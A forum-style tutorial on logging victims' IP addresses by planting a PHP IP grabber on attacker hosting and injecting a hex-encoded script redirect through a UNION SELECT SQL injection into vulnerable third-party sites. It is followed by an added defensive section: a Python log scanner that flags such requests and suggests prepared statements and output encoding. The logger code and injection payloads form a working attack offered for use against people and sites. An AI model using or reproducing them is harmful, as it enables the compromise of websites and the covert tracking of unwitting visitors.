
IP Grabbing Via SQL Injection


Credits to: Spanky

Hello all members

Do you know I'm new here. But I want to share something with you.

Today I will show you how to grab someone's IP address using SQL injection.

Requirements :

  • PHP IP Grabber
  • Hosting or Shelled Website
  • Javascript Knowledge or XSS knowledge
  • SQL Injection Knowledge
  • SQLi vulnerable website

OK. Let's start, brothers.

  • PHP IP Grabber

<?php

//IP Grabber

//Variables

$protocol = $_SERVER['SERVER_PROTOCOL'];
$ip = $_SERVER['REMOTE_ADDR'];
$port = $_SERVER['REMOTE_PORT'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$ref = $_SERVER['HTTP_REFERER'];
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);

//Print IP, Hostname, Port Number, User Agent and Referer To Log.TXT

$fh = fopen('log.txt', 'a');
fwrite($fh, 'IP Address: '."".$ip ."\n");
fwrite($fh, 'Hostname: '."".$hostname ."\n");
fwrite($fh, 'Port Number: '."".$port ."\n");
fwrite($fh, 'User Agent: '."".$agent ."\n");
fwrite($fh, 'HTTP Referer: '."".$ref ."\n\n");
fclose($fh);
?>

Create a file called LOG.TXT in the same folder as this .php script!

Copy the above code, open notepad.exe and paste it.

Save this note as filename.php. Then you must save a blank note as log.txt.

Now you have the PHP IP Grabber. The next step is hosting or a shelled website.

Upload your filename.php and log.txt.

The URLs will be like this: http://hosting.com/filename.php and http://hosting.com/log.txt

You must send http://hosting.com/filename.php to the victim. After the victim clicks the URL you sent, you can see the IP address at http://hosting.com/log.txt.

But I want to show you a method of sending it to the victim. It is very simple and effective for me.

Because I have many SQL injectors.

Now you must search for SQLi-vulnerable sites and inject them. OK.

Now, let's say you have a SQLi-vulnerable site.

http://www.site.com/catid=3 union select 1,2,@@version,4,5--

The above SQL query will show you the SQL version. If you have SQL knowledge, you will know it easily.

I told you, you must know about JavaScript or XSS. Look at the following code.

<script>window.location.href="http:// www.yourhosting.com/yourfilename.php"</script>

This code stands for a URL redirect. You can use this code instead of @@version in SQLi queries.

So our final code will be the following:

http://www.site.com/catid=3 union select 1,2,0x<script>window.location.href="http:// www.yourhosting.com/yourfilename.php"</script> ,4,5--

You need to change the string behind the 0x to hex.

You can change text to a hex value at the following site.

http://www.swingnote.com/tools/texttohex.php

Now you can send this URL to any SQL injectors.
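
From the defender's side, the request described in this post leaves a recognisable trace in web server access logs: a UNION SELECT in a numeric parameter carrying a 0x literal that decodes to a script redirect. The following is an added example, not part of the original post, that flags such requests; the combined log format, the `/index.php?catid=` path, the addresses and the collector host are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

UNION_SELECT = re.compile(r"union(?:\s|/\*.*?\*/)+(?:all\s+)?select", re.I | re.S)
# A 0x literal of at least four bytes, long enough to carry markup.
HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2}){4,})", re.I)
# Markup that has no business inside a numeric category parameter.
ACTIVE_MARKUP = re.compile(r"<\s*script|location\s*\.\s*href|javascript:", re.I)
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')


def inspect_request(raw_target):
    """Return findings for one request target (path plus query string)."""
    target = unquote_plus(raw_target)
    findings = []
    if UNION_SELECT.search(target):
        findings.append("union-select")
    for match in HEX_LITERAL.finditer(target):
        decoded = bytes.fromhex(match.group(1)).decode("latin-1")
        if ACTIVE_MARKUP.search(decoded):
            findings.append("hex-encoded-markup: " + decoded)
    # Markup sent without hex encoding is caught on the remaining text.
    if ACTIVE_MARKUP.search(HEX_LITERAL.sub("", target)):
        findings.append("plain-markup")
    return findings


def scan(log_lines):
    """Group findings by client address for combined-log-format lines."""
    alerts = {}
    for line in log_lines:
        parsed = LOG_LINE.match(line)
        if parsed:
            hits = inspect_request(parsed.group(2))
            if hits:
                alerts.setdefault(parsed.group(1), []).extend(hits)
    return alerts


# Constructed sample data: addresses, path and collector host are made up.
_HEX = b'<script>window.location.href="http://collector.example/x.php"</script>'.hex()
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?catid=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:02:11 +0000] "GET /index.php?catid=3%20union%20select%201,2,@@version,4,5-- HTTP/1.1" 200 5200',
    '203.0.113.9 - - [01/Jan/2024:10:03:40 +0000] "GET /index.php?catid=3+union+select+1,2,0x' + _HEX + ',4,5-- HTTP/1.1" 200 5300',
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG).items():
        print(client, hits)
```

A hit on `hex-encoded-markup` for a parameter that should only ever hold an integer points at two fixes on the affected site: bind the parameter in a prepared statement, and HTML-encode database values on output.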
